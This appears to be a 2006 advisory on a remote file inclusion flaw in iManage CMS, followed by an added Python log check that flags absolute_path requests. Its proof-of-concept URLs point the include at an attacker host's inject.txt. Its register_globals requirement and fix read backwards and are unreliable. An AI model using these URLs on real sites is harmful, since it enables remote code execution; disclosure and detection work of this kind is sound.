iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion

2006-07-25 / 2006-07-26
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

ECHO.OR.ID
ECHO_ADV_40$2006

---------------------------------------------------------------------------
[ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion
---------------------------------------------------------------------------

Author       : Ahmad Maulana a.k.a Matdhule
Date Found   : July, 20th 2006
Location     : Indonesia, Jakarta
web          : http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt
Critical Lvl : Highly critical
Impact       : System access
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iManage CMS from Imaginex-Resource

Application : iManage CMS
version     : 4.0.12 stable
URL         : http://www.imaginex-resource.com

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~

-----------------------component.php----------------------
....
<?php
/**
* iManage Version 4.0.12
* Dynamic portal server and Content managment engine
* 03-02-2003
*
* Copyright (C) 2000 - 2003 Imaginex-Resource
*
* Site Name: iManage Version 4.0.12
* File Name: rightComponent.php
* Date: 31/01/2003
* Version #: 4.0.12
* Comments: Display all modules which are to be displayed on the right.
**/

include($absolute_path.'/language/'.$lang.'/lang_components.php');
...
----------------------------------------------------------

Input passed to the "absolute_path" parameter in insert.php is not properly verified before being used.
This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Affected files:

articles.php
contact.php
displaypage.php
faq.php
mainbody.php
news.php
registration.php
whosOnline.php
components/com_calendar.php
components/com_forum.php
components/minibb/index.php
components/minibb/bb_admin.php
components/minibb/bb_plugins.php
modules/mod_calendar.php
modules/mod_browser_prefs.php
modules/mod_counter.php
modules/mod_online.php
modules/mod_stats.php
modules/mod_weather.php
themes/bizz.php
themes/default.php
themes/simple.php
themes/original.php
themes/portal.php
themes/purple.php

and more :)

Successful exploitation requires that "register_globals= Off".

Proof Of Concept:
~~~~~~~~~~~~~~~~~

http://target.com/[path]/articles.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/contact.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/displaypage.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/faq.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/mainbody.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/news.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/registration.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/whosOnline.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/com_calendar.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/com_forum.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/minibb/index.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/modules/mod_calendar.php?absolute_path=http://attacker.com//inject.txt?

and more Affected files

Solution:
~~~~~~~~~

- Change register_globals= On in php.ini
- Sanitize variable $absolute_path on affected files.

---------------------------------------------------------------------------

Shoutz:
~~~~~

~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker (at) yahoogroups (dot) com, jasakom_perjuangan (at) yahoogroups (dot) com
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------

Contact:
~~~~~~

matdhule[at]gmail[dot]com

-------------------------------- [ EOF ]----------------------------------
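
A log check for the request shape shown in the proof of concept, added here as an example (it is not part of the ECHO advisory or of iManage): it lists every request whose query string supplies absolute_path and labels the value as external or local. The sample log lines, the /cms/ prefix, the client addresses and attacker.example are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Common/combined log format: client, two ids, [time], "METHOD target HTTP/x", status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# scheme://... or //host/... points the include at another resource entirely.
EXTERNAL_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)

# Constructed sample lines (documentation address ranges, made-up /cms/ prefix).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jul/2006:10:01:02 +0700] "GET /cms/articles.php?id=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Jul/2006:10:01:09 +0700] "GET /cms/articles.php'
    '?absolute_path=http://attacker.example//inject.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [26/Jul/2006:10:01:11 +0700] "GET /cms/modules/mod_stats.php'
    '?absolute_path=http%3A%2F%2Fattacker.example%2Finject.txt%3F HTTP/1.0" 200 298',
    '198.51.100.9 - - [26/Jul/2006:10:02:40 +0700] "GET /cms/faq.php'
    '?x=1&absolute_path=/tmp HTTP/1.1" 500 0',
    '192.0.2.10 - - [26/Jul/2006:10:03:00 +0700] "GET /cms/news.php'
    '?ref=http://example.org/ HTTP/1.1" 200 4410',
]


def find_absolute_path_requests(lines):
    """Return (client, script, kind, value, status) for every request that
    supplies absolute_path in the query string."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        url = urlsplit(m.group("target"))
        # parse_qsl percent-decodes once, so encoded values are compared decoded.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name != "absolute_path":  # PHP variable names are case-sensitive
                continue
            kind = "external" if EXTERNAL_RE.match(value) else "local"
            hits.append((m.group("ip"), url.path, kind, value, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for hit in find_absolute_path_requests(SAMPLE_LOG):
        print(*hit, sep="\t")
```

The status code is reported for triage only; it does not show whether the include succeeded.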

